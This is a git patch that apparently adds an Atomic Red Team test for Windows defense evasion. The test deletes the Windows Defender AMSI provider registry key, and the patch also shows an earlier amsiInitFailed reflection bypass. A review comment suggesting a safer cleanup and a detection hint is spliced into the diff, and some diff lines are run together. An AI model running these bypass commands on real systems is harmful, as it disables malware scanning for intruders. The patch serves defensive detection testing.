From 7f35271b8e7280f8cd26251adc830a0d64c5d7c9 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Tue, 17 Sep 2019 19:17:51 +0000
Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master
---
 atomics/T1089/T1089.md | 23 +++++++++++++++++++++++
 atomics/index.md | 1 +
 atomics/index.yaml | 15 +++++++++++++++
 atomics/windows-index.md | 1 +
 4 files changed, 40 insertions(+)
diff --git a/atomics/T1089/T1089.md b/atomics/T1089/T1089.md
index 08c63e8f..1349e8a1 100644
--- a/atomics/T1089/T1089.md
+++ b/atomics/T1089/T1089.md
@@ -26,6 +26,8 @@
 - [Atomic Test #11 - AMSI Bypass - AMSI InitFailed](#atomic-test-11---amsi-bypass---amsi-initfailed)
+- [Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key](#atomic-test-12---amsi-bypass---remove-amsi-provider-reg-key)
+
@@ -260,3 +262,24 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
 ```
+
+
+## Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key
+With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
+This test removes the Windows Defender provider registry key.
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `powershell`! Elevation Required (e.g. root or admin)
+```
+Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
+```
+
+
+#### Cleanup Commands:
+```
+New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}"
+```
+
+
diff --git a/atomics/index.md b/atomics/index.md index cda438b7..6360f737 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -194,6 +194,7 @@ - Atomic Test #9: Disable Windows IIS HTTP Logging [windows] - Atomic Test #10: Uninstall Sysmon [windows] - Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows] + - Atomic Test #12: AMSI Bypass - Remove AMSI Provider Reg Key [windows] - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/index.yaml b/atomics/index.yaml index 154d1117..5188e4a1 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -6010,6 +6010,21 @@ defense-evasion: elevation_required: false command: "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\n" cleanup_command: "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)\n" + - name: AMSI Bypass - Remove AMSI Provider Reg Key + description: "With administrative rights, an adversary can remove the AMSI Provider + registry key in HKLM\\Software\\Microsoft\\AMSI to disable AMSI inspection.\nThis + test removes the Windows Defender provider registry key. \n" + supported_platforms: + - windows + executor: + name: powershell + elevation_required: true + command: 'Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" + -Recurse + +' + cleanup_command: New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" + -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" T1107: technique: external_references: diff --git a/atomics/windows-index.md b/atomics/windows-index.md index f634da4b..ab263544 100644 --- a/atomics/windows-index.md 
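Review bot: The `cleanup_command` in the new index.yaml entry is not idempotent and may not fully undo the test: `New-Item` fails when the key already exists (a failed or partially run `Remove-Item`, or a re-run), and it recreates only an empty key, so any values or subkeys that `-Recurse` deleted beneath the provider key are not restored — presumably the key is empty on a stock install, but that should be confirmed before relying on the cleanup. A guarded one-liner keeps it safe to re-run: `cleanup_command: if (-not (Test-Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}")) { New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" }`. The description's "disable AMSI inspection" also overstates the effect slightly: deleting this one key only keeps the Windows Defender provider from being loaded by AMSI, while any other provider registered under `Providers\` continues to scan, so I would reword it to "disable the Windows Defender AMSI provider". A short detection hint would help the defensive reader, e.g. adding to the description: "Detection: registry key deletion under HKLM\SOFTWARE\Microsoft\AMSI\Providers (Sysmon Event ID 12) is a high-fidelity signal for this technique."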
+++ b/atomics/windows-index.md @@ -38,6 +38,7 @@ - Atomic Test #9: Disable Windows IIS HTTP Logging [windows] - Atomic Test #10: Uninstall Sysmon [windows] - Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows] + - Atomic Test #12: AMSI Bypass - Remove AMSI Provider Reg Key [windows] - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)